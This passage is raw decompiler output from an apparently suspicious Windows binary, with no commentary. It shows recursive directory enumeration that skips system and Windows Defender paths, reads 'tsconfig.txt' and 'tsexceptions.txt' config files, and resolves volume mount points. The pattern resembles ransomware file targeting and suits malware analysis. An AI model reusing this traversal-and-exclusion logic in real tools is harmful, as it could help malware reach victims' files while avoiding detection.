                                                                    				intOrPtr* _t1087;
                                                                    				intOrPtr* _t1093;
                                                                    				signed int _t1095;
                                                                    				signed int _t1104;
                                                                    				intOrPtr _t1105;
                                                                    				intOrPtr* _t1107;
                                                                    				signed int _t1108;
                                                                    				signed int _t1109;
                                                                    				signed int* _t1118;
                                                                    				intOrPtr* _t1120;
                                                                    				signed int _t1121;
                                                                    				signed int _t1122;
                                                                    				signed int* _t1131;
                                                                    				intOrPtr* _t1140;
                                                                    				signed int _t1141;
                                                                    				signed int _t1142;
                                                                    				signed int* _t1151;
                                                                    				signed int _t1158;
                                                                    				void* _t1159;
                                                                    				signed char* _t1165;
                                                                    				char* _t1174;
                                                                    				char* _t1175;
                                                                    				long _t1193;
                                                                    				void* _t1195;
                                                                    				signed int _t1196;
                                                                    				void* _t1198;
                                                                    				signed int _t1199;
                                                                    				void* _t1200;
                                                                    				signed int _t1201;
                                                                    				void* _t1202;
                                                                    				signed int _t1203;
                                                                    				short* _t1204;
                                                                    				long _t1207;
                                                                    				signed int _t1209;
                                                                    				long _t1210;
                                                                    				void* _t1214;
                                                                    				intOrPtr _t1215;
                                                                    				intOrPtr _t1216;
                                                                    				signed char* _t1219;
                                                                    				void* _t1220;
                                                                    				signed int _t1221;
                                                                    				signed int _t1222;
                                                                    				signed int _t1223;
                                                                    				signed int _t1224;
                                                                    				signed int _t1225;
                                                                    				signed int _t1226;
                                                                    				signed int _t1228;
                                                                    				signed int _t1229;
                                                                    				signed int _t1230;
                                                                    				signed int _t1231;
                                                                    				signed int _t1233;
                                                                    				signed int _t1234;
                                                                    				signed int _t1235;
                                                                    				signed int _t1236;
                                                                    				signed int _t1239;
                                                                    				signed char _t1241;
                                                                    				intOrPtr _t1242;
                                                                    				intOrPtr _t1255;
                                                                    				intOrPtr* _t1259;
                                                                    				signed int _t1260;
                                                                    				signed int _t1261;
                                                                    				signed int _t1262;
                                                                    				signed int _t1266;
                                                                    				signed int _t1269;
                                                                    				signed int _t1271;
                                                                    				void* _t1272;
                                                                    				void* _t1274;
                                                                    				void* _t1275;
                                                                    				signed int _t1278;
                                                                    				void* _t1279;
                                                                    				void* _t1297;
                                                                    				long _t1298;
                                                                    				void* _t1299;
                                                                    				void* _t1300;
                                                                    				intOrPtr _t1303;
                                                                    				signed int _t1308;
                                                                    				signed int _t1330;
                                                                    
                                                                    				_t1217 = __edi;
                                                                    				_t1177 = __edx;
                                                                    				_t981 = __ebx;
                                                                    				_t1266 = _t1271;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec6cb9);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t1272 = _t1271 - 0x398;
                                                                    				_t675 =  *0xeef074; // 0x2b749d79
                                                                    				_t676 = _t675 ^ _t1266;
                                                                    				_v20 = _t676;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t676);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_v781 = __edx;
                                                                    				_t1239 = __ecx;
                                                                    				_v808 = __ecx;
                                                                    				_v824 = 0;
                                                                    				_v836 = 0;
                                                                    				_v8 = 0;
                                                                    				_t1303 =  *0xf2c0a8; // 0x0
                                                                    				if(_t1303 != 0) {
                                                                    					L114:
                                                                    					_v8 = 0xffffffff;
                                                                    					E00E59AF0(_t981,  &_a4, _t1217);
                                                                    					 *[fs:0x0] = _v16;
                                                                    					__eflags = _v20 ^ _t1266;
                                                                    					return E00EA7663(_v20 ^ _t1266);
                                                                    				} else {
                                                                    					E00E71920( &_v164,  &_a4);
                                                                    					_v8 = 1;
                                                                    					E00E59260( &_v164, L"\\*");
                                                                    					asm("xorps xmm0, xmm0");
                                                                    					asm("movlpd [ebp-0x80], xmm0");
                                                                    					_v132 = 0;
                                                                    					_v128 = 0;
                                                                    					_t684 = E00EA76B3(__ebx, _t1177, __edi, _t1239, _t1303);
                                                                    					 *_t684 = _t684;
                                                                    					 *(_t684 + 4) = _t684;
                                                                    					_v132 = _t684;
                                                                    					_v8 = 2;
                                                                    					asm("xorps xmm0, xmm0");
                                                                    					asm("movlpd [ebp-0x88], xmm0");
                                                                    					_v140 = 0;
                                                                    					_v136 = 0;
                                                                    					_t685 = E00EA76B3(__ebx, _t1177, __edi, _t1239, _t1303, 0x20, 0x20);
                                                                    					_t1274 = _t1272 + 8;
                                                                    					 *_t685 = _t685;
                                                                    					 *((intOrPtr*)(_t685 + 4)) = _t685;
                                                                    					_v140 = _t685;
                                                                    					_v8 = 3;
                                                                    					_t687 =  >=  ? _v164 :  &_v164;
                                                                    					_t688 = FindFirstFileW( >=  ? _v164 :  &_v164,  &_v780);
                                                                    					_v812 = _t688;
                                                                    					_v796 = 0;
                                                                    					if(_t688 == 0xffffffff) {
                                                                    						_t689 = GetLastError();
                                                                    						__eflags = _t689 - 5;
                                                                    						if(_t689 != 5) {
                                                                    							goto L36;
                                                                    						} else {
                                                                    							__eflags = _v781;
                                                                    							if(_v781 != 0) {
                                                                    								_t941 = _v148 - 1;
                                                                    								__eflags = _v144 - 8;
                                                                    								_v148 = _t941;
                                                                    								_t1153 =  >=  ? _v164 :  &_v164;
                                                                    								( >=  ? _v164 :  &_v164)[_t941] = 0;
                                                                    								__eflags = _v144 - 8;
                                                                    								_t1155 =  >=  ? _v164 :  &_v164;
                                                                    								E00E86F30( >=  ? _v164 :  &_v164, _t1239);
                                                                    								_v781 = 0;
                                                                    								_v828 = _t1274 - 0x18;
                                                                    								E00E71920(_t1274 - 0x18,  &_a4);
                                                                    								_v8 = 0xb;
                                                                    								_v8 = 3;
                                                                    								E00E64AE0(__ebx, _t1239, _v781, __edi, _t1239);
                                                                    							}
                                                                    							goto L113;
                                                                    						}
                                                                    					} else {
                                                                    						asm("o16 nop [eax+eax]");
                                                                    						goto L3;
                                                                    						do {
                                                                    							do {
                                                                    								L3:
                                                                    								_t1158 = _v780.nFileSizeHigh;
                                                                    								_t1259 =  &(_v780.cFileName);
                                                                    								_t1207 = _v780.dwFileAttributes;
                                                                    								_t947 = 0 + _v780.nFileSizeLow;
                                                                    								_v188 = _t1207;
                                                                    								asm("adc ecx, 0x0");
                                                                    								_v844 = _t947;
                                                                    								_v180 = _t947;
                                                                    								_t948 = _v780.dwReserved0;
                                                                    								_v840 = _t1158;
                                                                    								_v176 = _t1158;
                                                                    								_t1159 = _t1259 + 2;
                                                                    								_v172 = _t948;
                                                                    								_v816 = _t1207;
                                                                    								_v848 = _t948;
                                                                    								_v168 = 0;
                                                                    								goto L4;
                                                                    								do {
                                                                    									L6:
                                                                    									_t951 = _t1262;
                                                                    									_t1209 = _t951 * 2 >> 0x20;
                                                                    									_push( ~(0 | _t1308 > 0x00000000) | _t951 * 0x00000002);
                                                                    									_t1220 = E00EAEBCD();
                                                                    									_t1274 = _t1274 + 4;
                                                                    								} while (_t1220 == 0);
                                                                    								E00EA90F0(_t1220,  &(_v780.cFileName), 2 + _v820 * 2);
                                                                    								_t1275 = _t1274 + 0xc;
                                                                    								_v168 = _t1220;
                                                                    								_v8 = 4;
                                                                    								if((_v816 & 0x00000010) == 0) {
                                                                    									__eflags = _v128 - 0x7ffffff;
                                                                    									_t1241 = _v132;
                                                                    									if(__eflags == 0) {
                                                                    										L117:
                                                                    										_push("list too long");
                                                                    										E00EA5AB7();
                                                                    										asm("int3");
                                                                    										asm("int3");
                                                                    										_push(_t981);
                                                                    										_t982 = _t1275;
                                                                    										_t1278 = (_t1275 - 0x00000008 & 0xfffffff8) + 4;
                                                                    										_push(_t1266);
                                                                    										_v940 =  *((intOrPtr*)(_t982 + 4));
                                                                    										_t1269 = _t1278;
                                                                    										_push(0xffffffff);
                                                                    										_push(0xec6e69);
                                                                    										_push( *[fs:0x0]);
                                                                    										_push(_t982);
                                                                    										_t1279 = _t1278 - 0x1c8;
                                                                    										_t700 =  *0xeef074; // 0x2b749d79
                                                                    										_t701 = _t700 ^ _t1269;
                                                                    										_v964 = _t701;
                                                                    										_push(_t1241);
                                                                    										_push(_t1220);
                                                                    										_push(_t701);
                                                                    										 *[fs:0x0] =  &_v956;
                                                                    										_t1221 =  *(_t982 + 8);
                                                                    										_v948 = 0;
                                                                    										_t1242 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                    										_t704 =  *0xf2c2e4; // 0x0
                                                                    										__eflags = _t704 -  *((intOrPtr*)(_t1242 + 4));
                                                                    										if(_t704 >  *((intOrPtr*)(_t1242 + 4))) {
                                                                    											E00EA7D8A(_t704, 0xf2c2e4);
                                                                    											_t1279 = _t1279 + 4;
                                                                    											__eflags =  *0xf2c2e4 - 0xffffffff;
                                                                    											if( *0xf2c2e4 == 0xffffffff) {
                                                                    												_v24 = 1;
                                                                    												_push(L"\\tsconfig.txt");
                                                                    												E00E73CB0(_t982, 0xf2c2cc, 0xf29230, _t1221);
                                                                    												E00EA7928(0xf2c2cc, __eflags, 0xecc840);
                                                                    												_v24 = 0;
                                                                    												E00EA7D40(0xf2c2e4);
                                                                    												_t1279 = _t1279 + 0xc;
                                                                    											}
                                                                    										}
                                                                    										_t706 =  *0xf2c2e8; // 0x0
                                                                    										__eflags = _t706 -  *((intOrPtr*)(_t1242 + 4));
                                                                    										if(_t706 >  *((intOrPtr*)(_t1242 + 4))) {
                                                                    											E00EA7D8A(_t706, 0xf2c2e8);
                                                                    											_t1279 = _t1279 + 4;
                                                                    											__eflags =  *0xf2c2e8 - 0xffffffff;
                                                                    											if( *0xf2c2e8 == 0xffffffff) {
                                                                    												_v24 = 2;
                                                                    												_push(L"\\tsexceptions.txt");
                                                                    												E00E73CB0(_t982, 0xf2c2ec, 0xf29230, _t1221);
                                                                    												E00EA7928(0xf2c2ec, __eflags, 0xecc830);
                                                                    												_v24 = 0;
                                                                    												E00EA7D40(0xf2c2e8);
                                                                    												_t1279 = _t1279 + 0xc;
                                                                    											}
                                                                    										}
                                                                    										_push(L"\\programdata\\adobe\\extension manager cc\\logs\\");
                                                                    										E00E73CB0(_t982,  &_v356, _t982 + 0xc, _t1221);
                                                                    										_v24 = 3;
                                                                    										_push(L"\\programdata\\dat");
                                                                    										_t709 = E00E73CB0(_t982,  &_v492, _t982 + 0xc, _t1221);
                                                                    										_v24 = 4;
                                                                    										E00E59140( &_v332, _t709, "\\");
                                                                    										_v24 = 6;
                                                                    										E00E59AF0(_t982,  &_v492, _t1221);
                                                                    										_push(L"\\programdata\\microsoft\\crypto\\");
                                                                    										_t1182 = _t982 + 0xc;
                                                                    										E00E73CB0(_t982,  &_v308, _t982 + 0xc, _t1221);
                                                                    										_v24 = 7;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										_t1001 =  &_v140;
                                                                    										_v124 = 0;
                                                                    										asm("movups [ebp-0x78], xmm0");
                                                                    										E00E6EA40(_t1001, _t982 + 0xc, L"\\\\users\\\\[^\\\\]*\\\\ntuser.dat[^\\\\]*$");
                                                                    										_v24 = 8;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										_push(_t1001);
                                                                    										_t1002 =  &_v120;
                                                                    										_v104 = 0;
                                                                    										asm("movups [ebp-0x64], xmm0");
                                                                    										E00E6EA40(_t1002, _t982 + 0xc, L"\\\\users\\\\[^\\\\]*\\\\appdata\\\\local\\\\packages\\\\");
                                                                    										_v24 = 9;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										_push(_t1002);
                                                                    										_t1003 =  &_v100;
                                                                    										_v84 = 0;
                                                                    										asm("movups [ebp-0x50], xmm0");
                                                                    										E00E6EA40(_t1003, _t982 + 0xc, L"\\\\users\\\\[^\\\\]*\\\\appdata\\\\locallow\\\\microsoft\\\\");
                                                                    										_v24 = 0xa;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										_push(_t1003);
                                                                    										_t1004 =  &_v80;
                                                                    										_v64 = 0;
                                                                    										asm("movups [ebp-0x3c], xmm0");
                                                                    										E00E6EA40(_t1004, _t1182, L"\\\\users\\\\[^\\\\]*\\\\appdata\\\\roaming\\\\microsoft\\\\windows\\\\themes\\\\");
                                                                    										_v24 = 0xb;
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										_push(_t1004);
                                                                    										_v44 = 0;
                                                                    										asm("movups [ebp-0x28], xmm0");
                                                                    										E00E6EA40( &_v60, _t1182, L"\\\\users\\\\[^\\\\]*\\\\appdata\\\\local\\\\tiledatalayer\\\\");
                                                                    										_v24 = 0xc;
                                                                    										_push(L"\\programdata\\microsoft\\windows\\caches");
                                                                    										E00E73CB0(_t982,  &_v284, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0xd;
                                                                    										_push(L"\\program files\\windowsapps\\");
                                                                    										E00E73CB0(_t982,  &_v260, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0xe;
                                                                    										_push(L"\\program files\\windows defender\\");
                                                                    										E00E73CB0(_t982,  &_v236, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0xf;
                                                                    										_push(L"\\programdata\\microsoft\\windows\\apprepository\\");
                                                                    										E00E73CB0(_t982,  &_v212, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0x10;
                                                                    										_push(L"\\programdata\\microsoft\\user account pictures\\");
                                                                    										E00E73CB0(_t982,  &_v188, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0x11;
                                                                    										_push(L"\\programdata\\microsoft\\windows\\systemdata\\");
                                                                    										E00E73CB0(_t982,  &_v164, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0x12;
                                                                    										_push(L"\\programdata\\");
                                                                    										E00E73CB0(_t982,  &_v404, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0x13;
                                                                    										_push(L"\\users\\administrator\\appdata\\local\\microsoft\\windows\\");
                                                                    										E00E73CB0(_t982,  &_v380, _t982 + 0xc, _t1221);
                                                                    										_v24 = 0x14;
                                                                    										SetThreadPriority(GetCurrentThread(), 1);
                                                                    										_v464 =  &_v356;
                                                                    										_v460 =  &_v332;
                                                                    										_v456 =  &_v308;
                                                                    										_v452 =  &_v140;
                                                                    										_v448 =  &_v120;
                                                                    										_v444 =  &_v100;
                                                                    										_v440 =  &_v80;
                                                                    										_v436 =  &_v60;
                                                                    										_v432 =  &_v188;
                                                                    										_v428 =  &_v284;
                                                                    										_v424 =  &_v260;
                                                                    										_v420 =  &_v236;
                                                                    										_v416 =  &_v212;
                                                                    										_v412 =  &_v164;
                                                                    										_t742 =  *0xf2c0fc; // 0x0
                                                                    										_t1243 = _t1221 + _t1221 * 2;
                                                                    										E00E66110(_t982,  &_v464, _t1221, _t1221 + _t1221 * 2,  *((intOrPtr*)(_t742 + (_t1221 + _t1221 * 2) * 4)));
                                                                    										_t744 =  *0xf2c0fc; // 0x0
                                                                    										E00E66110(_t982,  &_v464, _t1221, _t1221 + _t1221 * 2,  *((intOrPtr*)(_t744 + _t1243 * 4)) + 8);
                                                                    										_v24 = 0x13;
                                                                    										E00E59AF0(_t982,  &_v380, _t1221);
                                                                    										_v24 = 0x12;
                                                                    										E00E59AF0(_t982,  &_v404, _t1221);
                                                                    										_v24 = 0x11;
                                                                    										E00E59AF0(_t982,  &_v164, _t1221);
                                                                    										_v24 = 0x10;
                                                                    										E00E59AF0(_t982,  &_v188, _t1221);
                                                                    										_v24 = 0xf;
                                                                    										E00E59AF0(_t982,  &_v212, _t1221);
                                                                    										_v24 = 0xe;
                                                                    										E00E59AF0(_t982,  &_v236, _t1221);
                                                                    										_v24 = 0xd;
                                                                    										E00E59AF0(_t982,  &_v260, _t1221);
                                                                    										_v24 = 0xc;
                                                                    										_t755 = E00E59AF0(_t982,  &_v284, _t1221);
                                                                    										_v24 = 0x15;
                                                                    										E00E72230(_t755,  &_v60);
                                                                    										_v24 = 0xb;
                                                                    										_t757 =  &_v56;
                                                                    										_v408 =  &_v56;
                                                                    										_v24 = 0xb;
                                                                    										_t1222 = _v44;
                                                                    										__eflags = _t1222;
                                                                    										if(_t1222 != 0) {
                                                                    											 *0xecd328();
                                                                    											_t757 =  *((intOrPtr*)( *((intOrPtr*)( *_t1222 + 8))))();
                                                                    											_t1231 =  &_v56;
                                                                    											__eflags = _t1231;
                                                                    											if(_t1231 != 0) {
                                                                    												 *0xecd328(1);
                                                                    												_t757 =  *((intOrPtr*)( *((intOrPtr*)( *_t1231))))();
                                                                    											}
                                                                    										}
                                                                    										_v24 = 0x18;
                                                                    										E00E72230(_t757,  &_v80);
                                                                    										_v24 = 0xa;
                                                                    										_t759 =  &_v76;
                                                                    										_v408 =  &_v76;
                                                                    										_v24 = 0xa;
                                                                    										_t1223 = _v64;
                                                                    										__eflags = _t1223;
                                                                    										if(_t1223 != 0) {
                                                                    											 *0xecd328();
                                                                    											_t759 =  *((intOrPtr*)( *((intOrPtr*)( *_t1223 + 8))))();
                                                                    											_t1230 =  &_v76;
                                                                    											__eflags = _t1230;
                                                                    											if(_t1230 != 0) {
                                                                    												 *0xecd328(1);
                                                                    												_t759 =  *((intOrPtr*)( *((intOrPtr*)( *_t1230))))();
                                                                    											}
                                                                    										}
                                                                    										_v24 = 0x1b;
                                                                    										E00E72230(_t759,  &_v100);
                                                                    										_v24 = 9;
                                                                    										_t761 =  &_v96;
                                                                    										_v408 =  &_v96;
                                                                    										_v24 = 9;
                                                                    										_t1224 = _v84;
                                                                    										__eflags = _t1224;
                                                                    										if(_t1224 != 0) {
                                                                    											 *0xecd328();
                                                                    											_t761 =  *((intOrPtr*)( *((intOrPtr*)( *_t1224 + 8))))();
                                                                    											_t1229 =  &_v96;
                                                                    											__eflags = _t1229;
                                                                    											if(_t1229 != 0) {
                                                                    												 *0xecd328(1);
                                                                    												_t761 =  *((intOrPtr*)( *((intOrPtr*)( *_t1229))))();
                                                                    											}
                                                                    										}
                                                                    										_v24 = 0x1e;
                                                                    										E00E72230(_t761,  &_v120);
                                                                    										_v24 = 8;
                                                                    										_t763 =  &_v116;
                                                                    										_v408 =  &_v116;
                                                                    										_v24 = 8;
                                                                    										_t1225 = _v104;
                                                                    										__eflags = _t1225;
                                                                    										if(_t1225 != 0) {
                                                                    											 *0xecd328();
                                                                    											_t763 =  *((intOrPtr*)( *((intOrPtr*)( *_t1225 + 8))))();
                                                                    											_t1228 =  &_v116;
                                                                    											__eflags = _t1228;
                                                                    											if(_t1228 != 0) {
                                                                    												 *0xecd328(1);
                                                                    												_t763 =  *((intOrPtr*)( *((intOrPtr*)( *_t1228))))();
                                                                    											}
                                                                    										}
                                                                    										_v24 = 0x21;
                                                                    										E00E72230(_t763,  &_v140);
                                                                    										_v24 = 7;
                                                                    										_v408 =  &_v136;
                                                                    										_v24 = 7;
                                                                    										_t1226 = _v124;
                                                                    										__eflags = _t1226;
                                                                    										if(_t1226 != 0) {
                                                                    											 *0xecd328();
                                                                    											_t1226 =  *((intOrPtr*)( *((intOrPtr*)( *_t1226 + 8))))();
                                                                    											__eflags = _t1226;
                                                                    											if(_t1226 != 0) {
                                                                    												 *0xecd328(1);
                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_t1226))))();
                                                                    											}
                                                                    										}
                                                                    										_v24 = 6;
                                                                    										E00E59AF0(_t982,  &_v308, _t1226);
                                                                    										_v24 = 3;
                                                                    										E00E59AF0(_t982,  &_v332, _t1226);
                                                                    										_v24 = 0;
                                                                    										E00E59AF0(_t982,  &_v356, _t1226);
                                                                    										_v24 = 0xffffffff;
                                                                    										E00E59AF0(_t982, _t982 + 0xc, _t1226);
                                                                    										 *[fs:0x0] = _v32;
                                                                    										__eflags = _v40 ^ _t1269;
                                                                    										return E00EA7663(_v40 ^ _t1269);
                                                                    									} else {
                                                                    										_v828 = 0;
                                                                    										_v832 =  &_v132;
                                                                    										_v8 = 5;
                                                                    										_push(0x20);
                                                                    										_v828 = 0;
                                                                    										_t1165 = E00EA76B3(_t981, _t1209, _t1220, _t1241, __eflags);
                                                                    										_t1275 = _t1275 + 4;
                                                                    										_v828 = _t1165;
                                                                    										_t1165[0x1c] = _t1220;
                                                                    										_t1220 = 0;
                                                                    										_v168 = 0;
                                                                    										_t1165[0x18] = _v848;
                                                                    										_t1165[0x10] = _v844;
                                                                    										_t1165[0x14] = _v840;
                                                                    										_t1165[8] = _v816;
                                                                    										_v8 = 6;
                                                                    										_t87 =  &_v128;
                                                                    										 *_t87 = _v128 + 1;
                                                                    										__eflags =  *_t87;
                                                                    										_t962 =  *(_t1241 + 4);
                                                                    										 *_t1165 = _t1241;
                                                                    										_t1165[4] = _t962;
                                                                    										 *(_t1241 + 4) = _t1165;
                                                                    										_v828 = 0;
                                                                    										 *_t962 = _t1165;
                                                                    										_v8 = 4;
                                                                    										goto L27;
                                                                    									}
                                                                    								} else {
                                                                    									_t1174 = ".";
                                                                    									_t975 = _t1220;
                                                                    									while(1) {
                                                                    										_t1214 =  *_t975;
                                                                    										if(_t1214 !=  *_t1174) {
                                                                    											break;
                                                                    										}
                                                                    										if(_t1214 == 0) {
                                                                    											L13:
                                                                    											_t976 = 0;
                                                                    										} else {
                                                                    											_t1216 =  *((intOrPtr*)(_t975 + 2));
                                                                    											_t62 =  &(_t1174[2]); // 0x5d0000
                                                                    											if(_t1216 !=  *_t62) {
                                                                    												break;
                                                                    											} else {
                                                                    												_t975 = _t975 + 4;
                                                                    												_t1174 =  &(_t1174[4]);
                                                                    												if(_t1216 != 0) {
                                                                    													continue;
                                                                    												} else {
                                                                    													goto L13;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										L15:
                                                                    										if(_t976 != 0) {
                                                                    											_t1175 = L"..";
                                                                    											_t977 = _t1220;
                                                                    											asm("o16 nop [eax+eax]");
                                                                    											while(1) {
                                                                    												_t1215 =  *_t977;
                                                                    												if(_t1215 !=  *_t1175) {
                                                                    													break;
                                                                    												}
                                                                    												if(_t1215 == 0) {
                                                                    													L21:
                                                                    													_t978 = 0;
                                                                    												} else {
                                                                    													_t1215 =  *((intOrPtr*)(_t977 + 2));
                                                                    													_t64 =  &(_t1175[2]); // 0x2e
                                                                    													if(_t1215 !=  *_t64) {
                                                                    														break;
                                                                    													} else {
                                                                    														_t977 = _t977 + 4;
                                                                    														_t1175 =  &(_t1175[4]);
                                                                    														if(_t1215 != 0) {
                                                                    															continue;
                                                                    														} else {
                                                                    															goto L21;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    												L23:
                                                                    												if(_t978 != 0) {
                                                                    													_push( &_v188);
                                                                    													E00E6EC10( &_v140, _t1215);
                                                                    													_t1220 = _v168;
                                                                    												}
                                                                    												goto L27;
                                                                    											}
                                                                    											asm("sbb eax, eax");
                                                                    											_t978 = _t977 | 0x00000001;
                                                                    											__eflags = _t978;
                                                                    											goto L23;
                                                                    										}
                                                                    										goto L27;
                                                                    									}
                                                                    									asm("sbb eax, eax");
                                                                    									_t976 = _t975 | 0x00000001;
                                                                    									__eflags = _t976;
                                                                    									goto L15;
                                                                    								}
                                                                    								goto L139;
                                                                    								L4:
                                                                    								_t949 =  *_t1259;
                                                                    								_t1259 = _t1259 + 2;
                                                                    								if(_t949 != 0) {
                                                                    									goto L4;
                                                                    								} else {
                                                                    									_t1260 = _t1259 - _t1159;
                                                                    									_t1308 = _t1260;
                                                                    									_t1261 = _t1260 >> 1;
                                                                    									_v820 = _t1261;
                                                                    									_t950 = _t1261 + 1;
                                                                    									_v800 = _t950;
                                                                    									_t1262 = _t950;
                                                                    								}
                                                                    								goto L6;
                                                                    								L27:
                                                                    								_t964 = FindNextFileW(_v812,  &_v780);
                                                                    								_t1264 = _t964;
                                                                    								_v800 = GetLastError();
                                                                    								_v8 = 3;
                                                                    								E00EAEBD8(_t1220);
                                                                    								_t1274 = _t1275 + 4;
                                                                    							} while (_t964 != 0);
                                                                    							_t1210 = _v800;
                                                                    							if(_t1210 != 5) {
                                                                    								__eflags = _t1210 - 0x12;
                                                                    								if(_t1210 != 0x12) {
                                                                    									break;
                                                                    								}
                                                                    								L35:
                                                                    								FindClose(_v812);
                                                                    								L36:
                                                                    								_t691 = _v148 - 1;
                                                                    								_v148 = _t691;
                                                                    								_t994 =  >=  ? _v164 :  &_v164;
                                                                    								_t1178 = 0;
                                                                    								( >=  ? _v164 :  &_v164)[_t691] = 0;
                                                                    								_t1219 = _v132;
                                                                    								_v812 = _t1219;
                                                                    								_t1241 =  *_t1219;
                                                                    								_v816 = _t1241;
                                                                    								if(_t1241 == _t1219) {
                                                                    									L96:
                                                                    									_t995 =  &_v132;
                                                                    									E00E6EB00( &_v132);
                                                                    									_t1220 = _v808 + _v808 * 2;
                                                                    									_t694 =  *0xf2c120; // 0x0
                                                                    									_t696 = E00EA5E4B( *((intOrPtr*)( *((intOrPtr*)(_t694 + _t1220 * 4)) + 0x14)));
                                                                    									_t1275 = _t1274 + 4;
                                                                    									__eflags = _t696;
                                                                    									if(_t696 != 0) {
                                                                    										goto L116;
                                                                    									} else {
                                                                    										_t794 =  *0xf2c0fc; // 0x0
                                                                    										__eflags = _a24 - 8;
                                                                    										_t1255 =  *((intOrPtr*)(_t794 + _t1220 * 4));
                                                                    										_t796 =  >=  ? _a4 :  &_a4;
                                                                    										E00E59D30( &_v800,  >=  ? _a4 :  &_a4);
                                                                    										_v8 = 0x1f;
                                                                    										_t417 = _t1255 + 0x28; // 0x28
                                                                    										E00E6F0E0(_t981, _t417, _t1178,  &_v800);
                                                                    										_v8 = 3;
                                                                    										E00EAEBD8(_v800);
                                                                    										_t801 =  *0xf2c120; // 0x0
                                                                    										E00EA5E5C( *((intOrPtr*)( *((intOrPtr*)(_t801 + _t1220 * 4)) + 0x14)));
                                                                    										_t1217 = _v140;
                                                                    										_t1297 = _t1275 + 8;
                                                                    										_t1241 =  *_t1217;
                                                                    										__eflags = _t1241 - _t1217;
                                                                    										if(_t1241 == _t1217) {
                                                                    											L112:
                                                                    											E00E6EB00( &_v140);
                                                                    											L113:
                                                                    											_v8 = 2;
                                                                    											E00E6EB90( &_v140);
                                                                    											_v8 = 1;
                                                                    											E00E6EB90( &_v132);
                                                                    											_v8 = 0;
                                                                    											E00E59AF0(_t981,  &_v164, _t1217);
                                                                    											goto L114;
                                                                    										} else {
                                                                    											do {
                                                                    												_push( *((intOrPtr*)(_t1241 + 0x1c)));
                                                                    												_t1178 =  &_v164;
                                                                    												E00E73CB0(_t981,  &_v188,  &_v164, _t1217);
                                                                    												_t1297 = _t1297 + 4;
                                                                    												_v8 = 0x20;
                                                                    												__eflags =  *(_t1241 + 8) & 0x00000400;
                                                                    												if(( *(_t1241 + 8) & 0x00000400) == 0) {
                                                                    													L107:
                                                                    													_t1298 = _t1297 - 0x18;
                                                                    													_v781 = 1;
                                                                    													_t1193 = _t1298;
                                                                    													_v856 = _t1298;
                                                                    													_v800 = _t1193;
                                                                    													 *(_t1193 + 0x10) = 0;
                                                                    													 *(_t1193 + 0x14) = 0;
                                                                    													__eflags = _v168 - 8;
                                                                    													_t1071 = _v172;
                                                                    													_t810 =  >=  ? _v188 :  &_v188;
                                                                    													_v820 = _t1071;
                                                                    													_v828 =  >=  ? _v188 :  &_v188;
                                                                    													__eflags = _t1071 - 8;
                                                                    													if(_t1071 >= 8) {
                                                                    														_t812 = _t1071 | 0x00000007;
                                                                    														__eflags = _t812 - 0x7ffffffe;
                                                                    														_t813 =  >  ? 0x7ffffffe : _t812;
                                                                    														_v852 = _t813;
                                                                    														_t1076 =  ~(0 | _t812 - 0x7ffffffe > 0x00000000) | _t813 + 0x00000001;
                                                                    														__eflags = _t1076;
                                                                    														_push(_t1076);
                                                                    														 *_v800 = L00E598D0(_t981, _t1193, _t1217, _t1241);
                                                                    														E00EA90F0(_t815, _v828, 2 + _v820 * 2);
                                                                    														_t1193 = _v800;
                                                                    														_t1298 = _t1298 + 0xc;
                                                                    														_t817 = _v852;
                                                                    														_t1071 = _v820;
                                                                    													} else {
                                                                    														asm("movups xmm0, [eax]");
                                                                    														_t817 = 7;
                                                                    														asm("movups [edx], xmm0");
                                                                    													}
                                                                    													 *(_t1193 + 0x10) = _t1071;
                                                                    													 *(_t1193 + 0x14) = _t817;
                                                                    													_v8 = 0x23;
                                                                    													_v8 = 0x20;
                                                                    													E00E64AE0(_t981, _v808, _v781, _t1217, _t1241);
                                                                    													_t1297 = _t1298 + 0x18;
                                                                    													goto L111;
                                                                    												} else {
                                                                    													__eflags =  *((intOrPtr*)(_t1241 + 0x18)) - 0xa0000003;
                                                                    													if( *((intOrPtr*)(_t1241 + 0x18)) != 0xa0000003) {
                                                                    														goto L111;
                                                                    													} else {
                                                                    														_v8 = 0x21;
                                                                    														_t995 = _v172;
                                                                    														__eflags = 0x7ffffffe - _t995 - 1;
                                                                    														if(0x7ffffffe - _t995 < 1) {
                                                                    															_t696 = E00E59480(_t995);
                                                                    															goto L116;
                                                                    														} else {
                                                                    															__eflags = _v168 - 8;
                                                                    															_t823 =  >=  ? _v188 :  &_v188;
                                                                    															_t824 = E00E77D30( &_v936,  &_v164, _v828, _t995,  >=  ? _v188 :  &_v188, _t995, "\\", 1);
                                                                    															_t1085 = _v824 | 0x00000002;
                                                                    															_v836 = _t1085;
                                                                    															__eflags =  *((intOrPtr*)(_t824 + 0x14)) - 8;
                                                                    															_v824 = _t1085;
                                                                    															if( *((intOrPtr*)(_t824 + 0x14)) >= 8) {
                                                                    																_t824 =  *_t824;
                                                                    															}
                                                                    															_v8 = 0x22;
                                                                    															__imp__GetVolumeNameForVolumeMountPointW(_t824,  &_v124, 0x32);
                                                                    															__eflags = 0;
                                                                    															_v896 = 0;
                                                                    															_t1087 =  &_v124;
                                                                    															_v892 = 0;
                                                                    															_v896 = 0;
                                                                    															_t1195 = _t1087 + 2;
                                                                    															_v892 = 7;
                                                                    															_v912 = 0;
                                                                    															do {
                                                                    																_t826 =  *_t1087;
                                                                    																_t1087 = _t1087 + 2;
                                                                    																__eflags = _t826;
                                                                    															} while (_t826 != 0);
